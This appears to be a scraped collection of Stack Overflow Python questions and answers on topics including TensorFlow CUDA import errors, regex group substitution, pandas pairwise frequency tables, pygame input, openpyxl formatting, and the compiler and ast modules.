[ "python", "osx", "pip", "tensorflow", "osx-elcapitan" ]
'Library not loaded: @rpath/libcudart.7.5.dylib' TensorFlow Error on Mac
38,710,339
<p>I'm using OS X El Capitan (10.11.4).</p> <p>I just downloaded TensorFlow using the pip install instructions <a href="https://www.tensorflow.org/versions/r0.10/get_started/os_setup.html">here</a>.</p> <p>Everything went pretty smoothly, though I did get a few warning messages like:</p> <p><code>The directory '/Users/myusername/Library/Caches/pip/http' or its parent directory is not owned by the current user and the cache has been disabled. Please check the permissions and owner of that directory. If executing pip with sudo, you may want the -H flag.</code></p> <p>and</p> <p><code>You are using pip version 6.0.8, however version 8.1.2 is available.</code> Even though I just installed pip.</p> <p>Then, when I tested TensorFlow in Python, I got the error:</p> <pre><code>&gt;&gt;&gt; import tensorflow as tf Traceback (most recent call last): File "&lt;stdin&gt;", line 1, in &lt;module&gt; File "/Library/Frameworks/Python.framework/Versions/3.4/lib/python3.4/site-packages/tensorflow/__init__.py", line 23, in &lt;module&gt; from tensorflow.python import * File "/Library/Frameworks/Python.framework/Versions/3.4/lib/python3.4/site-packages/tensorflow/python/__init__.py", line 48, in &lt;module&gt; from tensorflow.python import pywrap_tensorflow File "/Library/Frameworks/Python.framework/Versions/3.4/lib/python3.4/site-packages/tensorflow/python/pywrap_tensorflow.py", line 28, in &lt;module&gt; _pywrap_tensorflow = swig_import_helper() File "/Library/Frameworks/Python.framework/Versions/3.4/lib/python3.4/site-packages/tensorflow/python/pywrap_tensorflow.py", line 24, in swig_import_helper _mod = imp.load_module('_pywrap_tensorflow', fp, pathname, description) File "/Library/Frameworks/Python.framework/Versions/3.4/lib/python3.4/imp.py", line 243, in load_module return load_dynamic(name, filename, file) ImportError: dlopen(/Library/Frameworks/Python.framework/Versions/3.4/lib/python3.4/site-packages/tensorflow/python/_pywrap_tensorflow.so, 10): Library not loaded: @rpath/libcudart.7.5.dylib Referenced from: /Library/Frameworks/Python.framework/Versions/3.4/lib/python3.4/site-packages/tensorflow/python/_pywrap_tensorflow.so Reason: image not found </code></pre> <p>Now, when I try to do <code>pip uninstall tensorflow-0.10.0rc0</code> it tells me that it's not installed.</p> <p>The closest thing I've found to resembling this problem is <a href="https://github.com/tensorflow/tensorflow/issues/2278">this issue</a> in the TensorFlow GitHub docs (which I have not tried).</p> <p>How can I uninstall whatever it did install and get TensorFlow up and running correctly?</p>
6
2016-08-02T01:12:01Z
38,829,274
<p>To add to <a href="http://stackoverflow.com/a/38712022/169275">@mrry's answer</a>, if you already have CUDA installed but you still get the error, it could be because the CUDA libraries are not on your path. Add the following to your ~/.bashrc or ~/.zshrc:</p> <pre><code># export CUDA_HOME=/Developer/NVIDIA/CUDA-7.5 ## This is the default location on macOS export CUDA_HOME=/usr/local/cuda export DYLD_LIBRARY_PATH="$CUDA_HOME/lib:$DYLD_LIBRARY_PATH" export PATH="$CUDA_HOME/bin:$PATH" </code></pre> <p>Uncomment either of the <code>CUDA_HOME</code>s or edit it so that it contains your CUDA install. If you do not know where it is installed, try:</p> <pre><code>find / -name "*libcudart*" </code></pre>
1
2016-08-08T12:29:59Z
[ "python", "osx", "pip", "tensorflow", "osx-elcapitan" ]
Replace specific named group with re.sub in python
38,710,363
<p>I create a regular expression to find urls like <code>/places/:state/:city/whatever</code></p> <pre><code>p = re.compile('^/places/(?P&lt;state&gt;[^/]+)/(?P&lt;city&gt;[^/]+).*$') </code></pre> <p>This works just fine:</p> <pre><code>import re p = re.compile('^/places/(?P&lt;state&gt;[^/]+)/(?P&lt;city&gt;[^/]+).*$') path = '/places/NY/NY/other/stuff' match = p.match(path) print match.groupdict() </code></pre> <p>Prints <code>{'city': 'NY', 'state': 'NY'}</code>.</p> <p>How can I process a logfile to replace <code>/places/NY/NY/other/stuff</code> with the string <code>"/places/:state/:city/other/stuff"</code>? I'd like to get a sense of how many urls are of the "cities-type" without caring that the places are (<code>NY</code>, <code>NY</code>) specifically.</p> <p>The simple approach can fail:</p> <pre><code>import re p = re.compile('^/places/(?P&lt;state&gt;[^/]+)/(?P&lt;city&gt;[^/]+).*$') path = '/places/NY/NY/other/stuff' match = p.match(path) if match: groupdict = match.groupdict() for k, v in sorted(groupdict.items()): path = path.replace(v, ':' + k, 1) print path </code></pre> <p>Will print <code>/places/:city/:state/other/stuff</code>, which is backwards!</p> <p>Feels like there should be some way to use <code>re.sub</code> but I can't see it.</p>
0
2016-08-02T01:15:46Z
38,727,823
<p>Figured out a better way to do this. There is a property <code>groupindex</code> on a compiled regular expression which prints the groups <em>and their orders</em> in the pattern string:</p> <pre><code>&gt;&gt;&gt; p = re.compile('^/places/(?P&lt;state&gt;[^/]+)/(?P&lt;city&gt;[^/]+).*$') &gt;&gt;&gt; p.groupindex {'city': 2, 'state': 1} </code></pre> <p>Which can easily be iterated in the correct order:</p> <pre><code>&gt;&gt;&gt; sorted(p.groupindex.items(), key=lambda x: x[1]) [('state', 1), ('city', 2)] </code></pre> <p>Using this, I should be able to guarantee that I replace matches in their correct left-to-right order:</p> <pre><code>p = re.compile('^/places/(?P&lt;state&gt;[^/]+)/(?P&lt;city&gt;[^/]+).*$') path = '/places/NY/NY/other/stuff' match = p.match(path) if match: groupdict = match.groupdict() for k, _ in sorted(p.groupindex.items(), key=lambda x: x[1]): path = path.replace(groupdict[k], ':' + k, 1) print path </code></pre> <p>This loops over the groups in the correct order, which ensures that the replacement also occurs in the correct order, reliably resulting in the correct string:</p> <pre><code>/places/:state/:city/other/stuff </code></pre>
0
2016-08-02T18:20:22Z
[ "python", "regex", "string-substitution" ]
How do I get the accuracy/precision of a h2o model?
38,710,377
<p>I try to get the accurracy of my multiclass classifier using logistic regression.Is there any way to get the accuracy with a built-in function or do I have to write the function myself?</p> <p>below my code so far:</p> <pre><code>multinomial_fit = H2OGeneralizedLinearEstimator(family="multinomial",max_iterations=100) multinomial_fit.train(x=train_h2o_cro.columns[1:],y=train_h2o_cro.columns[0],training_frame=train_h2o) prediction_glm_h2o = multinomial_fit.predict(test_h2o) multinomial_fit.model_performance(test_h2o) </code></pre> <p>With the last line of code, I only get the mse and nothing else.</p> <p>Thanks in advance.</p>
2
2016-08-02T01:18:36Z
38,724,825
<p>you can use <code>multinomial_fit.logloss()</code>, here's an example using the iris dataset:</p> <pre><code>import h2o from h2o.estimators.glm import H2OGeneralizedLinearEstimator h2o.init() iris_df = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/iris/iris.csv") predictors = iris_df.columns[0:4] response_col = "C5" train,valid,test = iris_df.split_frame([.7,.15], seed =1234) glm_model = H2OGeneralizedLinearEstimator(family="multinomial") glm_model.train(predictors, response_col, training_frame = train, validation_frame = valid) print(glm_model.logloss(train = True)) print(glm_model.logloss(valid = True)) </code></pre>
0
2016-08-02T15:34:47Z
[ "python", "machine-learning", "classification", "h2o" ]
How do I get the accuracy/precision of a h2o model?
38,710,377
<p>I try to get the accurracy of my multiclass classifier using logistic regression.Is there any way to get the accuracy with a built-in function or do I have to write the function myself?</p> <p>below my code so far:</p> <pre><code>multinomial_fit = H2OGeneralizedLinearEstimator(family="multinomial",max_iterations=100) multinomial_fit.train(x=train_h2o_cro.columns[1:],y=train_h2o_cro.columns[0],training_frame=train_h2o) prediction_glm_h2o = multinomial_fit.predict(test_h2o) multinomial_fit.model_performance(test_h2o) </code></pre> <p>With the last line of code, I only get the mse and nothing else.</p> <p>Thanks in advance.</p>
2
2016-08-02T01:18:36Z
38,759,512
<p>This is currently unimplemented, but it makes sense to add this. Here is the <a href="https://0xdata.atlassian.net/browse/PUBDEV-3202" rel="nofollow">JIRA ticket</a> where you can track the progress.</p>
2
2016-08-04T06:00:14Z
[ "python", "machine-learning", "classification", "h2o" ]
How to dynamically create a class in Python with an initializer
38,710,388
<p>Here is some code to start with:</p> <pre><code>def objectify(name, fields): """ Create a new object including the __init__() method. """ def __init__(self, *argv): for name, val in zip(var_names, argv): setattr(self, name, val) # The following line of code is currently limited to a single dynamic class. # We would like to extend it to allow creating multiple classes # and each class should remember it's own fields. __init__.var_names = fields result = type(name, (object,), dict(__init__=__init__)) </code></pre> <p>The challenge here is to find a way to make unique copies of the <code>__init__()</code> method of each class which has a static list of its variable names.</p> <p>Plan B: We can do this using <code>eval()</code> to run code that a function generates. But <code>eval()</code> is to be avoided wherever possible. The challenge here is to do this without <code>eval()</code>.</p> <p>EDIT: While writing up the question I came up with a solution. (See below.) Maybe this will help someone.</p> <p>EDIT2: I would use this function to create something like a <code>namedtuple()</code>, except that they are mutable.</p> <pre><code>Point = objectify('point', ['x', 'y']) a = Point(1, 2) b = Point(2, 3) print a.__dict__ print b.__dict__ </code></pre>
0
2016-08-02T01:20:28Z
38,710,389
<p>Here is one solution:</p> <pre><code>def objectify(obj_name, fields): """ Create a new object including the __init__() method. """ def __init__(self, *argv): """ Generic initializer for dynamically created classes. """ fields = objectify.fields[self.__class__.__name__] for field, val in zip(fields, argv): setattr(self, field, val) result = type(obj_name, (object,), dict()) result.__init__ = __init__ # Save the list of fields in a static dictionary that is retrieved by class name. objectify.fields[obj_name] = fields return result objectify.fields = {} # A static local variable. </code></pre>
0
2016-08-02T01:20:28Z
[ "python" ]
How to dynamically create a class in Python with an initializer
38,710,388
<p>Here is some code to start with:</p> <pre><code>def objectify(name, fields): """ Create a new object including the __init__() method. """ def __init__(self, *argv): for name, val in zip(var_names, argv): setattr(self, name, val) # The following line of code is currently limited to a single dynamic class. # We would like to extend it to allow creating multiple classes # and each class should remember it's own fields. __init__.var_names = fields result = type(name, (object,), dict(__init__=__init__)) </code></pre> <p>The challenge here is to find a way to make unique copies of the <code>__init__()</code> method of each class which has a static list of its variable names.</p> <p>Plan B: We can do this using <code>eval()</code> to run code that a function generates. But <code>eval()</code> is to be avoided wherever possible. The challenge here is to do this without <code>eval()</code>.</p> <p>EDIT: While writing up the question I came up with a solution. (See below.) Maybe this will help someone.</p> <p>EDIT2: I would use this function to create something like a <code>namedtuple()</code>, except that they are mutable.</p> <pre><code>Point = objectify('point', ['x', 'y']) a = Point(1, 2) b = Point(2, 3) print a.__dict__ print b.__dict__ </code></pre>
0
2016-08-02T01:20:28Z
38,710,501
<p>You don't mention anything about the usage of fields later on. If you only need them in <code>__init__</code>, you don't need to save them at all:</p> <pre><code>def objectify(name, fields): """ Create a new object including the __init__() method. """ fields = fields[:] def __init__(self, *argv): for name, val in zip(fields, argv): setattr(self, name, val) result = type(name, (object,), dict(__init__=__init__)) return result </code></pre> <p>Otherwise, you should look at metaclasses - that's exactly the usecase for them.</p> <p>Updated: making a copy of <code>fields</code> ensures that changing the list in the caller will not affect the stored one. The values can still change... left as an exercise to the reader to verify everything is a <code>str</code>.</p>
3
2016-08-02T01:34:05Z
[ "python" ]
How to exclude blank cell in conditional formatting in openpyxl?
38,710,450
<p>I am using conditional formatting in openpyxl but got stumped trying to exclude blank cells. I have a column with numbers which I format using CellisRule. Code I use is below.</p> <pre><code>ws2.conditional_formatting.add('C3:C25',CellIsRule(operator='lessThan', formula=['85'], stopIfTrue=True, fill=redFill,font=whiteText)) ws2.conditional_formatting.add('C3:C25',CellIsRule(operator='greaterThan', formula=['89.99'], stopIfTrue=True, fill=greenFill)) ws2.conditional_formatting.add('C3:C25',CellIsRule(operator='between', formula=['85', '89.99'], stopIfTrue=True, fill=yellowFill)) </code></pre> <p>I tried to use FormulaRule but got no idea to use for the formula.</p> <p>Update:</p> <p>Instead of using conditional formatting, using a for loop worked. </p> <pre><code>for row in ws2.iter_rows("C3:C25"): for cell in row: if cell.value == None: set_stylewhite(cell) elif cell.value &gt;= 90: set_stylegreen(cell) elif cell.value &lt;= 85: set_stylered(cell) else: set_styleyellow(cell) </code></pre>
0
2016-08-02T01:27:47Z
38,743,351
<p>If you're using a formula then you should use the an <code>expression</code> type rule. In general, it's always better to compose the rules and styles separately:</p> <pre><code>from openpyxl import Workbook from openpyxl.formatting.rule import Rule from openpyxl.styles.differential import DifferentialStyle from openpyxl.styles import Font, PatternFill red_text = Font(color="9C0006") red_fill = PatternFill(bgColor="FFC7CE") dxf = DifferentialStyle(font=red_text, fill=red_fill) r = Rule(type="expression", dxf=dxf) r.formula = ["NOT(ISBLANK(A1))"] wb = Workbook() ws = wb.active for v in range(10): ws.append([v]) ws['A4'] = None ws.conditional_formatting.add("A1:A10".format(ws.max_row), r) wb.save("sample.xlsx") </code></pre>
0
2016-08-03T12:13:33Z
[ "python", "openpyxl" ]
How to check for variable key presses in pygame
38,710,532
<p>I have been trying to create a game using pygame and I am struggling to get pygame to check for a keypress based on a variable.</p> <p>The code I have so far is:</p> <pre><code>import random, pygame, sys from pygame.locals import * points=0 pygame.init() screen = pygame.display.set_mode((600,350)) pygame.display.set_caption("LETTERPRESS") while True: FONT = pygame.font.SysFont("Comic Sans MS",30) Letter=random.randint(1,26) Letters={ 1 :"a", 2 :"b", 3 :"c", 4 :"d", 5 :"e", 6 :"f", 7 :"g", 8 :"h", 9 :"i", 10:"j", 11:"k", 12:"l", 13:"m", 14:"n", 15:"o", 16:"p", 17:"q", 18:"r", 19:"s", 20:"t", 21:"u", 22:"v", 23:"w", 24:"x", 25:"y", 26:"z"} label = FONT.render(Letters[Letter],1,(255,0,0)) screen.blit(label,(285,160)) pygame.display.update() while True: for event in pygame.event.get(): if event.type==QUIT: pygame.quit() sys.exit() if event.type == pygame.KEYDOWN: if event.key == pygame.K_[Letters[Letter]]: points +=1 break </code></pre> <p>The problematic part of the code is:</p> <pre><code>if event.key == pygame.K_[Letters[Letter]]: </code></pre> <p>Also, if you have any ways that I can clean up my program, please tell me. </p> <p>Thanks :)</p>
3
2016-08-02T01:37:39Z
38,738,576
<p>One fix would be to change the dictionary to</p> <pre><code> Letters={ 1 :pygame.K_a, 2 :pygame.K_b, 3 :pygame.K_c, </code></pre> <p>and so on, then <code>if event.key == Letters[Letter]:</code></p> <p>For general clean-up, you can take this to code-review, in particular, I see no reason to use a dictionary instead of a list for <code>Letters</code></p> <pre><code>Letters = [pygame.K_a, pygame.K_b ...] </code></pre> <p>List are 0 indexed so you would need to remember that 0 is 'a' and so on.</p> <p>You could improve <code>label = FONT.render(Letters[Letter],1,(255,0,0))</code> as <code>label = FONT.render(chr(Letter+65),1,(255,0,0))</code>, which removes the need for the values in Letters to be literal letters. </p> <p>Finally there is a syntax error with the line <code>if event.type == pygame.KEYDOWN:</code> as it is not followed by an indented block.</p>
3
2016-08-03T08:39:51Z
[ "python" ]
Injecting data into javascript with Python Flask
38,710,603
<p>I am following the instructions from <a href="http://www.highcharts.com/docs/getting-started/your-first-chart" rel="nofollow">http://www.highcharts.com/docs/getting-started/your-first-chart</a> to create a sample chart. I have saved the main chunk of javascript locally, and am add the <code>&lt;script src="/chart.js"&gt;&lt;/script&gt;</code> tag in my html to reference it.</p> <p>On my side, I am using python flask to render a html template containing the script.</p> <pre><code>@app.route('/view', methods=['POST', 'GET']) def show_graph_view(): query= request.form['query'] data = get_current_data(query) return render_template('graph.html', data=data) </code></pre> <p>I have a function to prepare some custom and current data I want to plot instead and I want the data to be available once the client brower loads. How do I add this data into the charts? </p>
0
2016-08-02T01:46:37Z
38,710,782
<p>Assuming a globally accessible function, just call it in the module with the data converted to json on the server with the tojson and safe filters. </p> <pre><code>&lt;script type=text/javascript&gt; doSomethingWith({{ data|tojson|safe }}); &lt;/script&gt; </code></pre> <p>It's a bit hard to follow the logic when you mix together server side templating and client side scripting like this. But sometimes you gotta do it.</p>
1
2016-08-02T02:13:52Z
[ "javascript", "python", "flask" ]
Pairwise Frequency Table for Multiple Columns in Python
38,710,682
<p>I have a table of patients diagnosis codes where each row represents all the diagnosis for one patient:</p> <pre><code> D0 D1 D2 D3 D4 D5 D6 0 0 0 0 0 0 0 0 1 I48.91 R60.9 M19.90 Z87.2 0 0 0 2 496 564.00 477.9 0 J44.9 J30.9 I10 3 I96 R63.0 Z51.5 0 L97.909 I69.90 F01.50 4 491.21 428.0 427.31 V58.61 0 I48.91 Z79.01 5 0 0 0 0 0 0 0 6 J44.9 F41.9 I10 H61.22 0 Z23 0 7 0 0 0 0 0 0 0 8 M48.00 I12.9 N18.9 K59.00 0 N39.0 Z23 9 I11.9 R41.82 R56.9 E11.49 K59.00 0 J45.901 10 I11.9 N40.0 F01.50 0 N40.1 J18.9 J44.1 11 R31.9 M19.90 0 R53.81 0 0 0 12 0 0 0 0 0 0 0 13 M48.02 M48.06 I27.2 0 R53.81 0 0 14 I50.9 M19.90 F41.9 I25.10 0 0 0 15 0 0 0 0 0 0 0 16 I69.359 I48.91 R74.8 I10 0 T50.901A I95.9 </code></pre> <p>... for 600+ patients, each of which have up to 15 diagnosis. (The 0's represent no diagnosis). I want to create a pairwise frequency table to count the number of times patients have different pairs of diagnosis:</p> <pre><code> I48.91 R60.9 M19.90 I48.91 count(I48.91) count(I48.91, R60.9) count(I48.91, M19.90) R60.9 count(R60.9, 148.91) M19.9 ... </code></pre> <p>I have created the table like this:</p> <pre><code>FreqTable = pd.DataFrame(columns=UniqueCodes['DCODE'], index=UniqueCodes['DCODE']) FreqTable = FreqTable.fillna(0) </code></pre> <p><a href="http://stackoverflow.com/questions/22175793/table-of-pairwise-frequency-counts-in-python">Table of Pairwise frequency counts in Python</a> does this for one column of data using nested for loops, but this gets complicated for multiple columns. Anyone have a good pythonese way to do this?</p>
4
2016-08-02T01:57:14Z
38,710,903
<p>Let's create a smaller example to make it easier to see the effect of each step and verify the correctness of the result:</p> <pre><code>df = pd.DataFrame({'D0': ['0', 'A', 'B', 'C'], 'D1': ['B', '0', 'C', 'D'], 'D2': ['C','D','0','A']}) # D0 D1 D2 # 0 0 B C # 1 A 0 D # 2 B C 0 # 3 C D A </code></pre> <p>Since 0's are to be ignored, let's change them to NaNs:</p> <pre><code>df = df.replace('0', np.nan) </code></pre> <p>The column labels <code>D0</code>, <code>D1</code>, <code>D2</code> are also ignorable. It's the row that matters. So let's <a href="http://pandas.pydata.org/pandas-docs/stable/generated/pandas.DataFrame.stack.html" rel="nofollow"><code>stack</code></a> the columns to make one Series:</p> <pre><code>code = df.stack() 0 D1 B D2 C 1 D0 A D2 D 2 D0 B D1 C 3 D0 C D1 D D2 A dtype: object </code></pre> <p>And since, again, the column labels don't matter, let's drop the second level of the index:</p> <pre><code>code.index = code.index.droplevel(1) code.name = 'code' </code></pre> <p>so that we end up with</p> <pre><code>0 B 0 C 1 A 1 D 2 B 2 C 3 C 3 D 3 A Name: code, dtype: object </code></pre> <p>Notice that the index of this Series refers to the original row label in <code>df</code>. If we were to <a href="http://pandas.pydata.org/pandas-docs/stable/merging.html#joining-on-index" rel="nofollow"><code>join</code></a> <code>code</code> <em>with itself</em>, then we would get a listing of all the pairs of codes from the same row, for each row:</p> <pre><code>code = code.to_frame() pair = code.join(code, rsuffix='_2') # code code_2 # 0 B B # 0 B C # 0 C B # 0 C C # 1 A A # 1 A D # 1 D A # 1 D D # 2 B B # 2 B C # 2 C B # 2 C C # 3 C C # 3 C D # 3 C A # 3 D C # 3 D D # 3 D A # 3 A C # 3 A D # 3 A A </code></pre> <p>Now the problem is solved by using <a href="http://pandas.pydata.org/pandas-docs/stable/generated/pandas.crosstab.html" rel="nofollow"><code>pd.crosstab</code></a> to make a frequency table based on this data:</p> <pre><code>freq = pd.crosstab(pair['code'], pair['code_2']) </code></pre> <hr> <p>Putting it all together:</p> <pre><code>import numpy as np import pandas as pd df = pd.DataFrame({'D0': ['0', 'A', 'B', 'C'], 'D1': ['B', '0', 'C', 'D'], 'D2': ['C','D','0','A']}) # D0 D1 D2 # 0 0 B C # 1 A 0 D # 2 B C 0 # 3 C D A df = df.replace('0', np.nan) code = df.stack() code.index = code.index.droplevel(1) code.name = 'code' code = code.to_frame() pair = code.join(code, rsuffix='_2') freq = pd.crosstab(pair['code'], pair['code_2']) </code></pre> <p>yields</p> <pre><code>code_2 A B C D code A 2 0 1 2 B 0 2 2 0 C 1 2 3 1 D 2 0 1 2 </code></pre>
3
2016-08-02T02:30:58Z
[ "python", "pandas" ]
Python script with open('filename') works with IDLE but doesn't work in console
38,710,683
<p>I'm trying to make this simple keylogger in python, it works just fine when i run in IDLE, but in console it doesn't write the log to the file.</p> <pre><code>import pyHook, pythoncom, sys log = '' def OnKeyPress(event): global log log += chr(event.Ascii) if event.Ascii == 27: # if user press esc with open('teste27.txt', 'a') as f: f.write(log) f.close() sys.exit(0) #instantiate HookManager class new_hook = pyHook.HookManager() #listen to all keystrokes new_hook.KeyDown = OnKeyPress #Hook the keyboard new_hook.HookKeyboard() #start the session pythoncom.PumpMessages() </code></pre>
0
2016-08-02T01:57:16Z
38,727,752
<p>To be helpful to others, the problem in the question needs explanation. An 'open(filepath)' with a relative path, such as 'something.txt', will open the file relative to the 'current working directory'. For a simple filename, this means in that current working directory (CWD).</p> <p>When IDLE runs code in the editor, it makes the current working directory of the new process where it runs the code to be the directory of the code. (The CWD of the IDLE process is ignored.) So if you were editing r'C:\Users\henrique\Documents\Programas\Python\Keylogger\teste27.py', then opening 'teste27.txt' will indeed open r'C:\Users\henrique\Documents\Programas\Python\Keylogger\teste27.txt'.</p> <p>A console is a running program with a CWD. For most consoles, the default prompt includes the CWD. When you run a program from the console, it inherits that CWD amd runs with that CWD unless and until the program changes it. It must be that you did not make r'C:\Users\henrique\Documents\Programas\Python\Keylogger\' the console's CWD, but instead ran your program somewhere else by giving a path to the program: "python somepath/teste27.py". You should find a stray 'teste27.txt' in whatever CWD you started the program in.</p> <p>You can avoid having to add 'r' to paths by using forward slashes. 'C:/Users/henrique/Documents/Programas/Python/Keylogger/teste27.txt'. The only time you must use backslashes on Windows is in the console when you give a path for the program to be run.</p> <p>An alternate solution, useful when you open multiple files within a directory, is to make that directory the CWD. For instance,</p> <pre><code>import os os.chdir('C:/Users/henrique/Documents/Programas/Python/Keylogger') </code></pre> <p>Then 'open(texte27.txt)' would have worked as you wanted.</p>
0
2016-08-02T18:16:44Z
[ "python", "python-2.7", "file", "console", "python-idle" ]
Converting HTML to Excel with Django
38,710,688
<p>I have a reporting module in my Django app that gives the user the ability to see their reports on screen or to export them and have the export opened by Excel.</p> <p>The export is a cheat. I take the exact same output as the screen version and save it to a file with an .xls extension and response = HttpResponse(body, content_type='application/vnd.ms-excel') and badda-boom, badda-bing I have an Excel file that is lightly formatted, i.e. it respects the css styling that I've applied.</p> <p>The nice thing for the user is that the file auto-opens in Excel; there aren't any extra steps for them. (find the download, import a text file, etc.)</p> <p>Unfortunately it looks like Excel 2016 has decided (I'm guessing) that that's a security issue and no longer opens the file.</p> <p>I'm aware of various python -> Excel tools. openpyxl looks promising. But that's going to require me to touch each report.</p> <p>So, what I'm looking for is something that would give me what I have now, take an html file and have Excel open it as a native file and recognize the existing formatting. </p>
0
2016-08-02T01:58:45Z
38,809,400
<p>The behavior change has been noted by Microsoft and there are work arounds, for the user:</p> <p><a href="https://support.microsoft.com/en-us/kb/3181507" rel="nofollow">https://support.microsoft.com/en-us/kb/3181507</a></p> <p>It sounds like they're working on a fix.</p>
0
2016-08-06T22:45:48Z
[ "python", "django", "excel" ]
SyntaxError: invalid syntax line 138 unexpected error
38,710,691
<p>I'm facing deep troubles with a script I was trying to write to answer a question on a course I was doing. I keep on getting SyntaxError: invalid syntax line 138 which was a bit odd. Here is my script. It would be wonderful if somebody could explain how to solve this. Thanks</p> <pre><code>class Message(object): def __init__(self, text): self.message_text = text self.valid_words = load_words(WORDLIST_FILENAME) def get_message_text(self): return self.message_text def get_valid_words(self): return self.valid_words[:] def build_shift_dict(self, shift): lc_str = string.ascii_lowercase uc_str = string.ascii_uppercase shifted_dict = {} 
 for ltr in lc_str: if lc_str.index(ltr) + shift &lt; 26: shifted_dict[ltr] = lc_str[lc_str.index(ltr) + shift] else: shifted_dict[ltr] = lc_str[lc_str.index(ltr)-26+shift] for ltr in uc_str: if uc_str.index(ltr) + shift &lt; 26: shifted_dict[ltr] = uc_str[uc_str.index(ltr) + shift] else: shifted_dict[ltr] = uc_str[uc_str.index(ltr)-26+shift] return shifted_dict def apply_shift(self, shift): cipher = self.build_shift_dict(shift) ciphertext = "" for char in self.message_text: if char in cipher: ciphertext = ciphertext + cipher[char] else: ciphertext = ciphertext + char return ciphertext </code></pre>
0
2016-08-02T01:59:21Z
38,710,732
<p>Between these two lines:</p> <pre><code>shifted_dict = {} for ltr in lc_str: </code></pre> <p>You have a non-ASCII character (<code>'\xe2'</code>). Delete it.</p> <p>(Python tells you exactly this if you try to load your code in a Python interpreter.)</p>
1
2016-08-02T02:05:57Z
[ "python", "python-2.7", "syntax-error" ]
strptime with timestamp and AM/PM
38,710,721
<p>I am trying to convert from string to timestamp using:</p> <pre><code>from datetime import datetime date_object = datetime.strptime('09-MAR-15 12.54.45.000000000 AM', '%d-%b-%y %I.%M.%S.%f %p') </code></pre> <p>I get: <strong>ValueError</strong>: </p> <blockquote> <p>time data '09-MAR-15 12.54.45.000000000 AM' does not match format '%d-%b-%y %I.%M.%S.%f %p'</p> </blockquote>
0
2016-08-02T02:04:16Z
38,710,761
<p>The below will work as long as the the part after the decimal point always ends in 000. :-) <code>%f</code> captures microseconds, while I guess your timestamp uses nanoseconds?</p> <pre><code>date_object = datetime.strptime('09-MAR-15 12.54.45.000000000 AM', '%d-%b-%y %I.%M.%S.%f000 %p') </code></pre> <p>You might consider just chopping off those three digits. E.g.</p> <pre><code>date_object = datetime.strptime( re.sub(r'\d{3}( .M)$', r'\1', '09-MAR-15 12.54.45.000000000 AM'), '%d-%b-%y %I.%M.%S.%f %p') </code></pre>
2
2016-08-02T02:11:23Z
[ "python", "python-2.7" ]
python compiler package explain
38,710,757
<p>I searched hard, but could hardly find any information on how to use the python compiler package (<a href="https://docs.python.org/2/library/compiler.html" rel="nofollow">https://docs.python.org/2/library/compiler.html</a>) and how to create a Visitor class that can be feed into the compiler.walk(<a href="https://docs.python.org/2/library/compiler.html#compiler.walk" rel="nofollow">https://docs.python.org/2/library/compiler.html#compiler.walk</a>) method.</p> <p>Can someone help me please? Thanks in advance.</p>
0
2016-08-02T02:11:01Z
38,723,700
<p>You create a visitor class by defining a subclass of <code>compiler.visitor.ASTVisitor</code> and then defining a method <code>visitXXX</code> for each type of node that you want your visitor to handle (where <code>XXX</code> is the name of the node type - the possible types of nodes are listed in the table in the documentation you linked).</p> <p>Any such method will take one argument (two if you count <code>self</code>), which will be the node object representing the visited node. The attributes available on such an object are also listed in the table. If you want the visitor to proceed further into the tree, you should call <code>visit</code> on each child node of the node.</p> <blockquote> <p>In the compiler.visitor.walk() method, it accepts 2 paramenters, tree and visitor. What are those?</p> </blockquote> <p><code>tree</code> is the AST that you want to process and <code>visitor</code> is an instance of the visitor class that you created to process that AST.</p> <blockquote> <p>And how can i obtain those?</p> </blockquote> <p>You obtain the AST by calling <code>compiler.parse</code> on some Python source code and you obtain the visitor by writing a visitor class and creating an instance of it.</p> <p>Here's an example using a visitor that simply counts the number of addition operators in a piece of Python code:</p> <pre><code>import compiler class PlusCounter(compiler.visitor.ASTVisitor): def __init__(self): self.count = 0 def visitAdd(self, node): self.count += 1 self.visit(node.left) self.visit(node.right) plus_counter = PlusCounter() compiler.walk(compiler.parse("1 + 2 * (3 + 4)"), plus_counter) print(plus_counter.count) </code></pre> <hr> <p>And here's the same example using the non-deprecated <code>ast</code> package, which works basically the same way, but has a slightly different AST structure. Unlike the above code, this one will actually work in Python 3:</p> <pre><code>import ast class PlusCounter(ast.NodeVisitor): def __init__(self): self.pluses = 0 def visit_Add(self, node): # We don't need to visit any child nodes here because in the ast package # the AST is structured slightly differently and Add is merely a child # node of the BinOp node, which holds the operands. So Add itself has # no children that need to be visited self.pluses += 1 plus_counter = PlusCounter() plus_counter.visit(ast.parse("1 + 2 * (3 + 4)")) print(plus_counter.pluses) </code></pre>
2
2016-08-02T14:47:32Z
[ "python", "compiler-construction", "abstract-syntax-tree" ]
python compiler package explain
38,710,757
<p>I searched hard, but could hardly find any information on how to use the python compiler package (<a href="https://docs.python.org/2/library/compiler.html" rel="nofollow">https://docs.python.org/2/library/compiler.html</a>) and how to create a Visitor class that can be feed into the compiler.walk(<a href="https://docs.python.org/2/library/compiler.html#compiler.walk" rel="nofollow">https://docs.python.org/2/library/compiler.html#compiler.walk</a>) method.</p> <p>Can someone help me please? Thanks in advance.</p>
0
2016-08-02T02:11:01Z
38,725,221
<p>Since the <code>compiler</code> package is deprecated, you should probably also take a look at the <a href="https://docs.python.org/2/library/ast.html" rel="nofollow"><code>ast</code> package</a>.</p> <p>Good docs on the Python <code>ast</code> can be found in "<a href="https://greentreesnakes.readthedocs.io/en/latest/" rel="nofollow">Green Tree Snakes - The Missing Python AST docs</a>". A very extensive example of it's use is <a href="https://github.com/JdeH/Transcrypt/tree/1dd2380441fa371e33e3f272f3911fb2743baa98/transcrypt/modules/org/transcrypt/compiler.py#L434" rel="nofollow">Transcrypt's <code>Generator</code> class</a>.</p>
2
2016-08-02T15:53:34Z
[ "python", "compiler-construction", "abstract-syntax-tree" ]
python class's attribute not in __init__
38,710,765
<p>I want to know why the following codes work?<br></p> <pre><code>#!/usr/bin/env python3 import sys class Car(): def __init__(self): pass if __name__ == '__main__': c = Car() c.speed = 3 c.time = 5 print(c.speed, c.time) </code></pre> <p>I accidentally found that I don't have to init attributes in <strong>init</strong>. I learn from every tutor I have to put assignment in <strong>init</strong> like below.</p> <pre><code>#!/usr/bin/env python3 import sys class Car(): def __init__(self): self.speed = 3 self.time = 5 if __name__ == '__main__': c = Car() print(c.speed, c.time) </code></pre> <p>If there are some official documents can explain this would be better. </p>
1
2016-08-02T02:11:40Z
38,713,308
